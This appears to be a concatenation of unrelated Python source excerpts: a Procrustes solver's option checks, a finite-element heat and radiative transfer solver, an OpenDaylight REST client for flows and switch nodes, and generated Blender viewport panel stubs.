raise Exception("filename must be a string")
elif os.path.exists(self.options["filename"]):
raise Exception("\"{}\" already exists."
.format(self.options["filename"]))
if "strategy" not in keys:
self.options["strategy"] = "newfw"
elif self.options["strategy"] not in ("monotone", "bazfr", "newfw"):
raise Exception("strategy not implemented")
if "gtol" not in keys:
self.options["gtol"] = 1e-3
elif type(self.options["gtol"]) != float:
raise Exception("gtol must be a float")
if "eta" not in keys:
self.options["eta"] = 0.85
elif type(self.options["eta"]) != float:
raise Exception("eta must be a float")
if "etavar" not in keys:
self.options["etavar"] = False
elif type(self.options["etavar"]) != bool:
raise Exception("etavar must be a boolean")
if "maxiter" not in keys:
self.options["maxiter"] = 5000
elif type(self.options["maxiter"]) != int:
raise Exception("maxiter must be an integer")
if "verbose" not in keys:
self.options["verbose"] = 1
elif self.options["verbose"] not in (0, 1, 2, 3):
raise Exception("verbose must be 0, 1, 2 or 3")
if "changevar" not in keys:
self.options["changevar"] = False
elif type(self.options["changevar"]) != bool:
raise Exception("changevar must be True or False")
if "polar" not in keys:
self.options["polar"] = None
elif self.options["polar"] not in (None, "ns"):
raise Exception("polar must be ns or None")
if "timer" not in keys:
self.options["timer"] = False
elif type(self.options["timer"]) != bool:
raise Exception("timer must be boolean")
if "precond" not in keys:
self.options["precond"] = None
elif self.options["precond"] not in (None, "stupid"):
raise Exception("precond must be stupid or None")
def solve(self, problem):
"""
Effectively solve the problem using the SPG method.
Input:
``problem``: ``ProcrustesProblem`` instance
| |
<gh_stars>0
# -*- coding: utf-8 -*-
"""
@author: <NAME>
@copyright Copyright 2016, <NAME>
@lisence: MIT
@status: alpha
"""
import numpy as np
import NodeMapping
import ElemTools as et
import scipy.constants as sconst
from scipy.sparse.linalg import spsolve as scipy_sparse_linsolve
from scipy.sparse.linalg import eigsh as scipy_sparse_eigens
import time as python_time
import Accelerated as Accl
import csv
class ht3_solver:
    def __init__(self, mesh):
        """Store `mesh` and default-initialize every solver setting.

        Only stores configuration: the "USER FIELDS" below must be filled
        in by the caller, and `initialise()` must be called before the
        simulation is stepped.  The "SOLVER INTERNALS" are managed by the
        solver itself.
        """
        # USER FIELDS:
        # simulation setup
        # mesh
        self.mesh = mesh
        self.export_mesh = None  # For XFEM we use this mesh for data export.
        self.export_mesh_geomfix_nearest = None
        self.save_path = None
        # time
        self.max_T = None
        self.d_T = None
        # simulation setup optical
        self.v0_frequency = None
        self.fq_list = []
        # simulation setup temperatures
        self.background_temperature = None
        self.initial_temperature = None
        self.diff_scale = None
        # material properties
        # optical
        self.absorb_coeffs = []  # Absorbtion coefficients.
        self.alpha = None  # (Hemisperic emssivity)
        self.refr_idx_vol = None
        self.refr_idx_background = None
        self.r1 = None
        self.r2 = None
        # conductive
        self.density = None
        self.heat_capacity = None
        self.thermal_conductivity = None
        self.convect_coeff = None
        # SOLVER INTERNALS
        self.step = None
        self.current_T = None
        # cond would be true if currently solving for conduction
        self.cond = False
        # Last set of temperature coefficients
        self.lst_tmp = None
        # rad is none whilst not solving for radiation
        # takes value of index of frequency in fq list when solving for freq.
        self.rad = None
        # List of the last set(s) or radiative intensity coefficients
        self.lst_rad = []
        # Data retention
        self.saved_data = {}
        self.node_map = NodeMapping.NodeIdxMap()
        # Mesh to export point / element mapping
        self.export_to_elem = None
        self.norm_path = None
        self.expected_solution = None
        self.redefined = False
        # Default save/norm rules record every step; callers may override
        # these attributes with their own (step, dt) -> bool predicates.
        def save_rule(step, dt): return True
        self.save_rule = save_rule
        def norm_saving_rule(step, dt): return True
        self.norm_saving_rule = norm_saving_rule
def advance(self, sol):
""" Prepare for next simulation step
Saves last solution in correct place. Changes constants and functions
to be approriate for next step. Returns false if the simulation should
end, true otherwise.
"""
self.data_saving(sol)
simulation_continues = self._advance_settings(sol)
self.redef_vars()
self.reporting(sol)
self.norm_reporting()
return simulation_continues
    def _advance_settings(self, sol):
        """ Changes settings that indicate what the solver should be solving
        for next.  Saves sol correctly.

        sol is the solution vector of the last step (anything can be used
        on the first step).

        Returns False once the final timestep has been passed, True
        otherwise.  Stage order within a timestep: radiation band
        0..len(fq_list)-1 (when frequencies are configured), then one
        conduction step.
        """
        if self.cond == True:
            # Save last solution...
            self.lst_tmp = sol
            # Check if all timesteps are complete.
            self.current_T += self.d_T
            self.step += 1
            if self.current_T > self.max_T:
                return False
            # Set to not be conduction any more
            self.cond = False
            if len(self.fq_list) > 0:
                # There are radiation steps to do: start at band 0.
                self.rad = 0
            else:
                # No radiation frequencies configured, so the next step is
                # another pure-conduction step.
                self.cond = True
            return True
        # If we're here, we're either not done anything yet or have
        # just done a radiation step.
        if self.rad != None:
            # Save last solution
            self.lst_rad[self.rad] = sol
            # Advance to next radiation stage if one exists. Else cond.
            if self.rad + 1 != len(self.fq_list):
                self.rad += 1
            else:
                self.rad = None
                self.cond = True
            return True
        # If we've made it to here, we must be just setting the simulation
        # going; sanity-check the user-supplied configuration.
        assert (len(self.fq_list) == len(self.lst_rad))
        if len(self.lst_rad) > 0:
            assert (len(self.fq_list) == len(self.absorb_coeffs))
            assert (self.refr_idx_vol >= 0.0)
        # Could set to zero, but that might limit restarts. Just check
        # Validity....
        assert (self.step != None)
        assert (self.d_T > 0.0)
        assert (self.current_T != None)
        assert (self.max_T != None)
        assert (self.max_T > self.current_T)
        assert (self.diff_scale >= 0.0)
        assert (self.diff_scale <= 1.0)
        assert (self.thermal_conductivity > 0.0)
        assert (self.alpha >= 0.0)
        assert (self.refr_idx_background >= 0.0)
        # Set the ball rolling:
        if len(self.fq_list) > 0:
            # We can set solver for frequencies first...
            self.rad = 0
        else:
            self.cond = True
        return True
def redef_vars(self):
""" Redefines constants and vectors used to be appropriate for time
and solver step.
"""
# Try using redefined source / boundary terms
if self.redefined == True:
self._redef_via_predef_eqn()
else: # If they haven't been set you'll get an exception.
self._redef_sp1_vars()
    def _redef_via_predef_eqn(self):
        """Rebuild Beta, Epsilon and the source/boundary vectors from the
        solver's predefined equations.

        Used when ``self.redefined`` is True, i.e. ``redef_F_laplacian``,
        ``redef_f_norm_grad`` and ``redef_dTdt`` were attached to the
        solver before ``initialise`` ran.
        """
        time = self.current_T  # + self.d_T
        self.Beta = (self.diff_scale * self.thermal_conductivity) / \
                    (self.convect_coeff)
        self.Epsilon = self.d_T * self.thermal_conductivity / \
                       (self.density * self.heat_capacity)
        # Source term.
        def F_func(elem, eta):
            # Previous temperature plus the predefined Laplacian / time
            # derivative contributions, weighted by the basis functions.
            x = elem.local_to_global(eta)
            F = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
            F -= self.Epsilon * self.redef_F_laplacian(x[0], x[1], time)
            F += self.redef_dTdt(x[0], x[1], time) * self.d_T
            return elem.funcs(eta) * F
        self.vF_vect_vol = et.elems_2_array(self.mesh,
                                            F_func,
                                            self.node_map,
                                            gauss_mult=2)  # Use double gp_1D
        # Boundary term.
        def f_func(elem, eta):
            n = elem.guess_normal_vector_global(eta)
            f = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
            x = elem.local_to_global(eta)
            # Evaluate our boundary term.
            f += self.Beta * self.redef_f_norm_grad(x[0], x[1], time, n)
            f += self.redef_dTdt(x[0], x[1], time) * self.d_T
            return elem.funcs(eta) * f
        self.vf_vect_bound = et.edge_2_array(self.mesh,
                                             "Boundary",
                                             f_func,
                                             self.node_map,
                                             gauss_mult=2)
def _redef_sp1_vars(self):
""" Redefines constants and vectors to be appropriate for time and
solver step in an SP1 approximation of RHT / heat transfer."""
if len(self.fq_list) == 0:
no_rad = True
lst_tmp = np.matrix(np.reshape(self.lst_tmp,
(self.lst_tmp.size, 1)))
else: no_rad = False
# The practically constants...
# Big Epsilon:
if self.cond == True:
self.Epsilon = self.d_T * self.thermal_conductivity
else:
self.Epsilon = (self.diff_scale ** 2) / \
(3.0 * self.absorb_coeffs[self.rad] ** 2)
# Beta:
if self.cond == True:
self.Beta = (self.diff_scale * self.thermal_conductivity) / \
(self.convect_coeff)
else:
self.Beta = (1.0 + 3.0 * self.r2) * (2.0 * self.diff_scale) / \
((1.0 - 2.0 * self.r1) * (
3.0 * self.absorb_coeffs[self.rad]))
# The feild solutions at the last timestep.
# The integral vF:
if self.cond == True:
# The horrifically complicated F:
def F_func_cond(elem, eta):
F = 0.0
Tn = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
F += Tn
for k in range(0, len(self.fq_list)):
vk = self.fq_list[k]
try:
vk_m = self.fq_list[k - 1]
except:
vk_m = self.v0_frequency
absorbtion = self.absorb_coeffs[k]
phi = elem.eval_elem(self.node_map, self.lst_rad[k],
[eta])[0]
inter1 = phi - 4.0 * sconst.pi * \
self.B_int_function(Tn, self.refr_idx_vol,
vk, vk_m)
inter2 = absorbtion * self.d_T / (self.diff_scale ** 2)
F += inter2 * inter1
return elem.funcs(eta) * F
if not no_rad:
# We're integrating something non-linear for SP1
self.vF_vect_vol = et.elems_2_array(self.mesh,
F_func_cond,
self.node_map)
else:
# Or something easier if we're only looking at heat.
self.vF_vect_vol = np.array(self.uv_vol * lst_tmp).reshape(-1)
else:
def F_func_radiative(elem, eta):
T = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
vk = self.fq_list[self.rad]
try:
vk_minus = self.fq_list[self.rad - 1]
except:
vk_minus = self.v0_frequency
n = self.refr_idx_vol
F = 4.0 * sconst.pi * self.B_int_function(T, n, vk, vk_minus)
return elem.funcs(eta) * F
self.vF_vect_vol = et.elems_2_array(self.mesh,
F_func_radiative,
self.node_map)
# The path integral vf:
if self.cond == True:
def f_func_cond(elem, eta):
Tb = self.background_temperature
Tn = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
n = self.refr_idx_background
vk = self.v0_frequency
vk_minus = 0
Bb0 = self.B_int_function(Tb, n, vk, vk_minus)
Bn0 = self.B_int_function(Tn, n, vk, vk_minus)
B_coeff = (self.alpha * sconst.pi) / self.convect_coeff
f = Tb + B_coeff * (Bb0 - Bn0)
return elem.funcs(eta) * f
if not no_rad:
self.vf_vect_bound = et.edge_2_array(self.mesh,
"Boundary",
f_func_cond,
self.node_map)
else:
try:
self.vf_vect_bound = self.cache_tb_integral_array
except AttributeError:
def elem_functor(elem, eta): return elem.funcs(eta)
self.cache_tb_integral_array = et.edge_2_array(self.mesh,
"Boundary",
elem_functor,
self.node_map)
self.cache_tb_integral_array *= self.background_temperature
self.vf_vect_bound = self.cache_tb_integral_array
else:
# Radiation f = 4*pi*B^{(k)}(T_b, n_g)
def f_func_radiative(elem, eta):
T = self.background_temperature
vk = self.fq_list[self.rad]
try:
vk_minus = self.fq_list[self.rad - 1]
except:
vk_minus = self.v0_frequency
n = self.refr_idx_vol
f = 4 * sconst.pi * self.B_int_function(T, n, vk, vk_minus)
return elem.funcs(eta) * f
self.vf_vect_bound = et.edge_2_array(self.mesh,
"Boundary",
f_func_radiative,
self.node_map)
assert (self.vF_vect_vol.size == self.vF_vect_vol.shape[0])
assert (self.vf_vect_bound.size == self.vf_vect_bound.shape[0])
assert (self.vf_vect_bound.shape[0] == \
self.vF_vect_vol.shape[0])
def initialise(self, initial=None):
""" Prepare for the start of simulation.
Build nodemapping object.
Prepare T0, defaults as initial temperatures or
initial(x, y) if provided as argument.
Setup constant matrices.
"""
ticy = python_time.clock()
if hasattr(self, 'redef_F_laplacian') or \
hasattr(self, 'redef_f_norm_grad'):
print("ht3_solver:\tVariables resassigned to known solution.")
assert (hasattr(self, 'redef_F_laplacian'))
assert (hasattr(self, 'redef_f_norm_grad'))
self.redefined = True
self._print_setup()
# Add all elem DoFs to NodeMapping
for elem in self.mesh.elems.values():
self.node_map.tags_to_idxs(elem.elem_node_tag_gen())
# Set initial condition.
t0 = np.zeros(self.node_map.count, dtype=np.float64)
if initial is None:
for elem in self.mesh.elems.values():
idxs = self.node_map.tags_to_idxs(elem.elem_node_tag_gen())
t0[idxs[:elem.dnen()]] = | |
<reponame>eriksore/sdn
"""
OpenDaylight REST API
Copyright 2013 The University of Wisconsin Board of Regents
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Written by: <NAME>, <EMAIL>
Network Services Group
Division of Information Technology
University of Wisconsin at Madison
This material is based upon work supported by the National Science Foundation
under Grant No. 1247322.
"""
from __future__ import print_function
import json
import requests
from requests.auth import HTTPBasicAuth
class OpenDaylight(object):
    """Connection details for talking to the OpenDaylight REST API.

    Attributes:
        setup: dictionary of connection settings ('hostname', 'port',
            'username', 'password', 'path', 'container', 'http').
            Change these as required for your installation.
        url: the URL used for each REST query.  Typically you let
            prepare() build this for you.
        auth: the auth object Requests uses for each REST query.
            Typically you also let prepare() build this for you.
    """

    def __init__(self):
        """Populate `setup` with mostly reasonable defaults."""
        self.setup = {'hostname': '192.168.231.246',
                      'port': '8080',
                      'username': 'admin',
                      'password': '<PASSWORD>',
                      'path': '/controller/nb/v2/',
                      'container': 'default',
                      'http': 'http://'}
        self._base_url = None
        self.url = None
        self.auth = None

    def prepare(self, app, path):
        """Set up url and auth for one REST call.

        Arguments:
            app: which OpenDaylight northbound API component (application)
                to talk to.
            path: the specific REST query for that application.
        """
        self.prepare_url(app, path)
        self.prepare_auth()

    def prepare_url(self, app, path):
        """Build self.url for this REST connection.

        prepare() calls this for you; only assemble a URL by hand when you
        need something this helper cannot express.  The container and the
        other connection attributes come from the `setup` dictionary.
        """
        cfg = self.setup
        # Base endpoint of the northbound API, then the app-specific path.
        self._base_url = '{}{}:{}{}'.format(cfg['http'], cfg['hostname'],
                                            cfg['port'], cfg['path'])
        self.url = '{}{}/{}{}'.format(self._base_url, app,
                                      cfg['container'], path)

    def prepare_auth(self):
        """Create the credentials object Requests will use, in self.auth.

        prepare() calls this for you.  The OpenDaylight controller
        currently uses HTTP basic auth; update this method if/when that
        changes.
        """
        self.auth = HTTPBasicAuth(self.setup['username'],
                                  self.setup['password'])
        # print("Prepare set up auth: " + self.setup['username'] + ', ' +
        #       self.setup['password'])
class OpenDaylightFlow(object):
    """Client for the OpenDaylight Flow Programmer application REST API.

    Attributes:
        odl: an OpenDaylight object holding the connection details.
        request: the Requests object for the last REST call; see the
            Requests documentation for everything available, e.g.
            request.status_code (the http code) and request.text (the
            response as text).
        flows: dictionary corresponding to the flowConfig element in the
            OpenDaylight REST API.  The flowConfig fields are deliberately
            not defined statically here, which keeps this library flexible
            as flowConfig changes over time — this is REST, not RPC.
    """

    def __init__(self, odl):
        """Mandatory argument: odl - an OpenDaylight object."""
        self.odl = odl
        self.__app = 'flow'
        self.request = None
        self.flows = None

    def get(self, node_id=None, flow_name=None):
        """Fetch flows from the controller into self.flows.

        Optional arguments:
            node_id: return flows just for that switch dpid.
            flow_name: return the specifically named flow on that switch.

        Raises OpenDaylightError on any non-200 response.
        """
        # Clear out any remaining crud from previous calls.
        for stale in ('request', 'flows'):
            if hasattr(self, stale):
                delattr(self, stale)
        if node_id is None:
            suffix = '/'
        elif flow_name is None:
            suffix = '/' + 'OF/' + node_id + '/'
        else:
            suffix = '/' + 'OF/' + node_id + '/' + flow_name + '/'
        self.odl.prepare(self.__app, suffix)
        self.request = requests.get(url=self.odl.url, auth=self.odl.auth)
        if self.request.status_code != 200:
            raise OpenDaylightError({'url': self.odl.url,
                                     'http_code': self.request.status_code,
                                     'msg': self.request.text})
        self.flows = self.request.json()
        if 'flowConfig' in self.flows:
            self.flows = self.flows.get('flowConfig')

    def add(self, flow):
        """Add `flow` (a flowConfig-style dictionary) to the controller.

        The switch dpid and the flow's name are taken from the flowConfig
        itself.  Raises OpenDaylightError unless the controller answers
        201 (created).
        """
        if hasattr(self, 'request'):
            del self.request
        node = flow['node']
        self.odl.prepare(self.__app, '/' + node['@type'] + '/' +
                         node['@id'] + '/' + flow['name'] + '/')
        body = json.dumps(flow)
        self.request = requests.post(url=self.odl.url, auth=self.odl.auth,
                                     data=body,
                                     headers={'Content-type':
                                              'application/json'})
        if self.request.status_code != 201:
            raise OpenDaylightError({'url': self.odl.url,
                                     'http_code': self.request.status_code,
                                     'msg': self.request.text})

    # update() — pushing changes to an existing flow — is intentionally
    # not implemented yet.

    def delete(self, node_id, flow_name):
        """Delete a flow from a Node on the Controller.

        Mandatory arguments:
            node_id: the switch dpid.
            flow_name: the specifically named flow on that switch.

        Raises OpenDaylightError unless the controller answers 200.
        """
        if hasattr(self, 'request'):
            del self.request
        # Deleting takes just the dpid and flow name; passing in a whole
        # flowConfig-style dictionary (as add() does) felt clunky here.
        self.odl.prepare(self.__app, '/' + 'OF/' + node_id + '/' +
                         flow_name + '/')
        self.request = requests.delete(url=self.odl.url, auth=self.odl.auth)
        if self.request.status_code != 200:
            raise OpenDaylightError({'url': self.odl.url,
                                     'http_code': self.request.status_code,
                                     'msg': self.request.text})
#pylint: disable=R0921
class OpenDaylightNode(object):
"""A way to talk to the OpenDaylight Switch Manager REST API
OpenDaylight.odl holds an OpenDaylight object containing details
on how to communicate with the controller.
OpenDaylightNode.request holds a Requests object for the REST
session. Take a look at the Requests documentation for all of
the methods available, but here are a few handy examples:
OpenDaylightNode.request.status_code - returns the http code
OpenDaylightNode.request.text - returns the response as text
OpenDaylightNode.nodes holds a dictionary that corresponds to
the 'nodes' element in the OpenDaylight REST API.
OpenDaylightNode.node_connectors holds a dictionary that corresponds to
the 'nodeConnectors' element in the OpenDaylight REST API.
Note that we don't statically define what those fields are contained
in the 'nodes' or 'nodeConnectors' elements here in this object.
"""
# Just a note that there are more functions available on
# the controller that could be implemented, but it is not
# clear at this time if that is useful
    def __init__(self, odl):
        """Mandatory argument:
        odl - an OpenDaylight object
        """
        self.odl = odl
        # Northbound API component used when building REST paths.
        self.__app = 'switch'
        # Filled in by get_nodes() / get_node_connectors() respectively.
        self.nodes = None
        self.node_connectors = None
        # Requests object for the most recent REST call.
        self.request = None
def get_nodes(self):
"""Get information about Nodes on the Controller and stuffs the
result into the OpenDaylightNode.notes dictionary.
"""
if hasattr(self, 'request'):
del self.request
if hasattr(self, 'nodes'):
del self.nodes
self.odl.prepare(self.__app, '/nodes/')
self.request = requests.get(url=self.odl.url, auth=self.odl.auth)
if self.request.status_code == 200:
self.nodes = self.request.json()
if 'nodeProperties' in self.nodes:
self.nodes = self.nodes.get('nodeProperties')
else:
raise OpenDaylightError({'url':self.odl.url,
'http_code':self.request.status_code,
'msg':self.request.text})
def get_node_connectors(self, node_id):
"""Get information about NodeConnectors on the Controller and stuffs the
result into the OpenDaylightNode.node_connectors dictionary.
Mandatory Arguments:
node_id - returns flows just for that switch dpid
"""
| |
draw(self, context):
'''
'''
pass
    # NOTE(review): the methods below are auto-generated stub declarations
    # (empty bodies) mirroring Blender's bpy API surface; they exist only
    # so tooling can introspect the interface and carry no behavior.
    def draw_header(self, context):
        '''
        '''
        pass

    def driver_add(self):
        '''
        '''
        pass

    def driver_remove(self):
        '''
        '''
        pass

    def get(self):
        '''
        '''
        pass

    def is_extended(self):
        '''
        '''
        pass

    def is_property_hidden(self):
        '''
        '''
        pass

    def is_property_overridable_library(self):
        '''
        '''
        pass

    def is_property_readonly(self):
        '''
        '''
        pass

    def is_property_set(self):
        '''
        '''
        pass

    def items(self):
        '''
        '''
        pass

    def keyframe_delete(self):
        '''
        '''
        pass

    def keyframe_insert(self):
        '''
        '''
        pass

    def keys(self):
        '''
        '''
        pass

    def path_from_id(self):
        '''
        '''
        pass

    def path_resolve(self):
        '''
        '''
        pass

    def pop(self):
        '''
        '''
        pass

    def prepend(self, draw_func):
        '''
        '''
        pass

    def property_overridable_library_set(self):
        '''
        '''
        pass

    def property_unset(self):
        '''
        '''
        pass

    def remove(self, draw_func):
        '''
        '''
        pass

    def type_recast(self):
        '''
        '''
        pass

    def values(self):
        '''
        '''
        pass
class VIEW3D_PT_overlay_object(bpy_types.Panel, bpy_types._GenericUI):
    # NOTE(review): auto-generated stub of a Blender 3D-viewport overlay
    # panel; attribute values and empty method bodies are placeholders for
    # introspection only and carry no behavior.
    bl_label = None
    ''' '''
    bl_parent_id = None
    ''' '''
    bl_region_type = None
    ''' '''
    bl_rna = None
    ''' '''
    bl_space_type = None
    ''' '''
    id_data = None
    ''' '''

    def append(self, draw_func):
        '''
        '''
        pass

    def as_pointer(self):
        '''
        '''
        pass

    def bl_rna_get_subclass(self):
        '''
        '''
        pass

    def bl_rna_get_subclass_py(self):
        '''
        '''
        pass

    def draw(self, context):
        '''
        '''
        pass

    def driver_add(self):
        '''
        '''
        pass

    def driver_remove(self):
        '''
        '''
        pass

    def get(self):
        '''
        '''
        pass

    def is_extended(self):
        '''
        '''
        pass

    def is_property_hidden(self):
        '''
        '''
        pass

    def is_property_overridable_library(self):
        '''
        '''
        pass

    def is_property_readonly(self):
        '''
        '''
        pass

    def is_property_set(self):
        '''
        '''
        pass

    def items(self):
        '''
        '''
        pass

    def keyframe_delete(self):
        '''
        '''
        pass

    def keyframe_insert(self):
        '''
        '''
        pass

    def keys(self):
        '''
        '''
        pass

    def path_from_id(self):
        '''
        '''
        pass

    def path_resolve(self):
        '''
        '''
        pass

    def pop(self):
        '''
        '''
        pass

    def prepend(self, draw_func):
        '''
        '''
        pass

    def property_overridable_library_set(self):
        '''
        '''
        pass

    def property_unset(self):
        '''
        '''
        pass

    def remove(self, draw_func):
        '''
        '''
        pass

    def type_recast(self):
        '''
        '''
        pass

    def values(self):
        '''
        '''
        pass
class VIEW3D_PT_overlay_pose(bpy_types.Panel, bpy_types._GenericUI):
    '''Generated stub of a Blender 3D-viewport overlay panel.

    All class attributes are None placeholders and every method body is a
    no-op; the real behavior lives in Blender's bpy runtime.
    '''
    # Placeholder class attributes (all None in this stub).
    bl_label = None
    ''' '''
    bl_parent_id = None
    ''' '''
    bl_region_type = None
    ''' '''
    bl_rna = None
    ''' '''
    bl_space_type = None
    ''' '''
    id_data = None
    ''' '''
    def append(self, draw_func):
        '''No-op stub.'''
        pass
    def as_pointer(self):
        '''No-op stub.'''
        pass
    def bl_rna_get_subclass(self):
        '''No-op stub.'''
        pass
    def bl_rna_get_subclass_py(self):
        '''No-op stub.'''
        pass
    def draw(self, context):
        '''No-op stub.'''
        pass
    def driver_add(self):
        '''No-op stub.'''
        pass
    def driver_remove(self):
        '''No-op stub.'''
        pass
    def get(self):
        '''No-op stub.'''
        pass
    def is_extended(self):
        '''No-op stub.'''
        pass
    def is_property_hidden(self):
        '''No-op stub.'''
        pass
    def is_property_overridable_library(self):
        '''No-op stub.'''
        pass
    def is_property_readonly(self):
        '''No-op stub.'''
        pass
    def is_property_set(self):
        '''No-op stub.'''
        pass
    def items(self):
        '''No-op stub.'''
        pass
    def keyframe_delete(self):
        '''No-op stub.'''
        pass
    def keyframe_insert(self):
        '''No-op stub.'''
        pass
    def keys(self):
        '''No-op stub.'''
        pass
    def path_from_id(self):
        '''No-op stub.'''
        pass
    def path_resolve(self):
        '''No-op stub.'''
        pass
    def poll(self, context):
        '''No-op stub.'''
        pass
    def pop(self):
        '''No-op stub.'''
        pass
    def prepend(self, draw_func):
        '''No-op stub.'''
        pass
    def property_overridable_library_set(self):
        '''No-op stub.'''
        pass
    def property_unset(self):
        '''No-op stub.'''
        pass
    def remove(self, draw_func):
        '''No-op stub.'''
        pass
    def type_recast(self):
        '''No-op stub.'''
        pass
    def values(self):
        '''No-op stub.'''
        pass
class VIEW3D_PT_overlay_sculpt(bpy_types.Panel, bpy_types._GenericUI):
    '''Generated stub of a Blender 3D-viewport overlay panel.

    All class attributes are None placeholders and every method body is a
    no-op; the real behavior lives in Blender's bpy runtime.
    '''
    # Placeholder class attributes (all None in this stub).
    bl_context = None
    ''' '''
    bl_label = None
    ''' '''
    bl_parent_id = None
    ''' '''
    bl_region_type = None
    ''' '''
    bl_rna = None
    ''' '''
    bl_space_type = None
    ''' '''
    id_data = None
    ''' '''
    def append(self, draw_func):
        '''No-op stub.'''
        pass
    def as_pointer(self):
        '''No-op stub.'''
        pass
    def bl_rna_get_subclass(self):
        '''No-op stub.'''
        pass
    def bl_rna_get_subclass_py(self):
        '''No-op stub.'''
        pass
    def draw(self, context):
        '''No-op stub.'''
        pass
    def driver_add(self):
        '''No-op stub.'''
        pass
    def driver_remove(self):
        '''No-op stub.'''
        pass
    def get(self):
        '''No-op stub.'''
        pass
    def is_extended(self):
        '''No-op stub.'''
        pass
    def is_property_hidden(self):
        '''No-op stub.'''
        pass
    def is_property_overridable_library(self):
        '''No-op stub.'''
        pass
    def is_property_readonly(self):
        '''No-op stub.'''
        pass
    def is_property_set(self):
        '''No-op stub.'''
        pass
    def items(self):
        '''No-op stub.'''
        pass
    def keyframe_delete(self):
        '''No-op stub.'''
        pass
    def keyframe_insert(self):
        '''No-op stub.'''
        pass
    def keys(self):
        '''No-op stub.'''
        pass
    def path_from_id(self):
        '''No-op stub.'''
        pass
    def path_resolve(self):
        '''No-op stub.'''
        pass
    def poll(self, context):
        '''No-op stub.'''
        pass
    def pop(self):
        '''No-op stub.'''
        pass
    def prepend(self, draw_func):
        '''No-op stub.'''
        pass
    def property_overridable_library_set(self):
        '''No-op stub.'''
        pass
    def property_unset(self):
        '''No-op stub.'''
        pass
    def remove(self, draw_func):
        '''No-op stub.'''
        pass
    def type_recast(self):
        '''No-op stub.'''
        pass
    def values(self):
        '''No-op stub.'''
        pass
class VIEW3D_PT_overlay_texture_paint(bpy_types.Panel, bpy_types._GenericUI):
    '''Generated stub of a Blender 3D-viewport overlay panel.

    All class attributes are None placeholders and every method body is a
    no-op; the real behavior lives in Blender's bpy runtime.
    '''
    # Placeholder class attributes (all None in this stub).
    bl_label = None
    ''' '''
    bl_parent_id = None
    ''' '''
    bl_region_type = None
    ''' '''
    bl_rna = None
    ''' '''
    bl_space_type = None
    ''' '''
    id_data = None
    ''' '''
    def append(self, draw_func):
        '''No-op stub.'''
        pass
    def as_pointer(self):
        '''No-op stub.'''
        pass
    def bl_rna_get_subclass(self):
        '''No-op stub.'''
        pass
    def bl_rna_get_subclass_py(self):
        '''No-op stub.'''
        pass
    def draw(self, context):
        '''No-op stub.'''
        pass
    def driver_add(self):
        '''No-op stub.'''
        pass
    def driver_remove(self):
        '''No-op stub.'''
        pass
    def get(self):
        '''No-op stub.'''
        pass
    def is_extended(self):
        '''No-op stub.'''
        pass
    def is_property_hidden(self):
        '''No-op stub.'''
        pass
    def is_property_overridable_library(self):
        '''No-op stub.'''
        pass
    def is_property_readonly(self):
        '''No-op stub.'''
        pass
    def is_property_set(self):
        '''No-op stub.'''
        pass
    def items(self):
        '''No-op stub.'''
        pass
    def keyframe_delete(self):
        '''No-op stub.'''
        pass
    def keyframe_insert(self):
        '''No-op stub.'''
        pass
    def keys(self):
        '''No-op stub.'''
        pass
    def path_from_id(self):
        '''No-op stub.'''
        pass
    def path_resolve(self):
        '''No-op stub.'''
        pass
    def poll(self, context):
        '''No-op stub.'''
        pass
    def pop(self):
        '''No-op stub.'''
        pass
    def prepend(self, draw_func):
        '''No-op stub.'''
        pass
    def property_overridable_library_set(self):
        '''No-op stub.'''
        pass
    def property_unset(self):
        '''No-op stub.'''
        pass
    def remove(self, draw_func):
        '''No-op stub.'''
        pass
    def type_recast(self):
        '''No-op stub.'''
        pass
    def values(self):
        '''No-op stub.'''
        pass
class VIEW3D_PT_overlay_vertex_paint(bpy_types.Panel, bpy_types._GenericUI):
    '''Generated stub of a Blender 3D-viewport overlay panel.

    All class attributes are None placeholders and every method body is a
    no-op; the real behavior lives in Blender's bpy runtime.
    '''
    # Placeholder class attributes (all None in this stub).
    bl_label = None
    ''' '''
    bl_parent_id = None
    ''' '''
    bl_region_type = None
    ''' '''
    bl_rna = None
    ''' '''
    bl_space_type = None
    ''' '''
    id_data = None
    ''' '''
    def append(self, draw_func):
        '''No-op stub.'''
        pass
    def as_pointer(self):
        '''No-op stub.'''
        pass
    def bl_rna_get_subclass(self):
        '''No-op stub.'''
        pass
    def bl_rna_get_subclass_py(self):
        '''No-op stub.'''
        pass
    def draw(self, context):
        '''No-op stub.'''
        pass
    def driver_add(self):
        '''No-op stub.'''
        pass
    def driver_remove(self):
        '''No-op stub.'''
        pass
    def get(self):
        '''No-op stub.'''
        pass
    def is_extended(self):
        '''No-op stub.'''
        pass
    def is_property_hidden(self):
        '''No-op stub.'''
        pass
    def is_property_overridable_library(self):
        '''No-op stub.'''
        pass
    def is_property_readonly(self):
        '''No-op stub.'''
        pass
    def is_property_set(self):
        '''No-op stub.'''
        pass
    def items(self):
        '''No-op stub.'''
        pass
    def keyframe_delete(self):
        '''No-op stub.'''
        pass
    def keyframe_insert(self):
        '''No-op stub.'''
        pass
    def keys(self):
        '''No-op stub.'''
        pass
    def path_from_id(self):
        '''No-op stub.'''
        pass
    def path_resolve(self):
        '''No-op stub.'''
        pass
    def poll(self, context):
        '''No-op stub.'''
        pass
    def pop(self):
        '''No-op stub.'''
        pass
    def prepend(self, draw_func):
        '''No-op stub.'''
        pass
    def property_overridable_library_set(self):
        '''No-op stub.'''
        pass
    def property_unset(self):
        '''No-op stub.'''
        pass
    def remove(self, draw_func):
        '''No-op stub.'''
        pass
    def type_recast(self):
        '''No-op stub.'''
        pass
    def values(self):
        '''No-op stub.'''
        pass
class VIEW3D_PT_overlay_weight_paint(bpy_types.Panel, bpy_types._GenericUI):
bl_label = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
